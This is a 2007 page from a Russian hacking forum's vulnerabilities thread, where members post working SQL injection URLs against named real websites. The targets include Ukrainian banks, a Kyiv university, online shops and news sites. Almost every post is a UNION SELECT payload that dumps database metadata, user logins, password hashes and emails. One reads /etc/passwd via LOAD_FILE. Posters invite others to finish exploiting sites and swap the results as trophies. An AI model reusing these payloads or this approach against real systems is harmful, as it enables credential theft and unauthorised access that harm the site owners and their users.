ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1471  
Старый 30.03.2007, 17:15
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Т.к. скуля выводит все записи (все строки), то там где много ограничил её лимитом с 0 по 15 запись:

Код:
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version())/*
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+0,15/*

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(110,101,117,95,117,115,101,114,115)/*
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(id,char(58),login,char(58),password,char(58),name,char(58),email)+from+bers.neu_users/*

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(97,100,109,105,110,115)+limit+0,15/*

Код:
http://www.istrodina.com/rodina_articul.php3?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14/*

Последний раз редактировалось Grey; 30.03.2007 в 17:17..
 
Ответить с цитированием

  #1472  
Старый 30.03.2007, 17:19
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

<noindex>
www.diamantbank.ua


Код:
http://www.diamantbank.ua/?el_id=-1+union+select+passwd+from+users/*
</noindex>
 
Ответить с цитированием

  #1473  
Старый 30.03.2007, 18:44
Аватар для Fr-Ron
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Очень давно выкладывал, но то была просто скуля без запроса...

Цитата:
http://shkola.lv/index.php?mode=wgoods&page=uroki&lsnid=13+UNION+SE LECT+1,concat(user_icq,0x3a,user_password),3,4,5+f rom+forum_users+where+user_icq+%3C%3E+0/*
*****

Вот тут дальше не продвинулся, если кто будет смотреть - отпишитесь че да как...

Цитата:
http://www.sims2club.ru/news/?action=edit&list=&onpage=-1

Последний раз редактировалось Fr-Ron; 30.03.2007 в 20:00..
 
Ответить с цитированием

  #1474  
Старый 30.03.2007, 19:09
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Давненько не выкладывал =(
Код:
http://www.simpleprinciples.com/main/main.html?Id=7+union+select+1,2,3,4,concat_ws(char(58),version(),database(),user())/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1475  
Старый 30.03.2007, 20:26
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Shoping
Код:
http://www.10dance.it/shop/pagine.php?id=-9+union+select+1,user(),3,4/*
Код:
http://www.euroinf.it/shop/shop.php?id=-86+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,7,8/*
Код:
http://shop.colinmcraesport.com/item.php?id=-8+union+select+1,2,3,4,5,6,LOAD_FILE(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Код:
http://www.kbmedien.ch/shop/bestellform.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Код:
http://www.vlp-aspan.ch/de/shop/category.php?id=-6+union+select+concat(user_password,0x3a,user_name)+from+users+limit+13,1/*
перебор юзеров лимитом
 
Ответить с цитированием

  #1476  
Старый 30.03.2007, 20:29
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

www.ukma.kiev.ua

Национальный Университет Киево-Могилянской Академии


падлюки, не взяли меня =( пусть терь локти грызут

Код:
http://www.ukma.kiev.ua/news/news_detailed.php?id=-1+union+select+1,2,3,concat(username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_users/*
 
Ответить с цитированием

  #1477  
Старый 30.03.2007, 21:01
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.ukrinfo.net/s.p?g=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
http://www.ukrinfo.net/s.p?g=-1+union+select+table_name+from+information_schema.tables+limit+17,1/*
http://www.ukrinfo.net/s.p?g=-1+union+select+concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(65,100,109,105,110)+limit+0,1/*
http://www.ukrinfo.net/s.p?g=-1+union+select+concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(99,111,110,116,114,111,108)+limit+0,1/*
 
Ответить с цитированием

  #1478  
Старый 30.03.2007, 21:02
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.uvacres.org/faculty_page.php?id=-12+union+select+1,user,3,4,password,6,7,8,9,10,11, 12+from+users
0_o
upd
Цитата:
http://www.israellawcenter.org/articlenav.php?id=-7+union+select+1,2,3,4,version(),6,7

Последний раз редактировалось Spyder; 30.03.2007 в 21:13..
 
Ответить с цитированием

  #1479  
Старый 30.03.2007, 21:22
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

www.avtozazbank.com


Код:
http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
 
Ответить с цитированием

  #1480  
Старый 30.03.2007, 21:32
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

2Ksander
Цитата:
http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,concat(user_name,0x3a ,user_pass),9+from+users/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ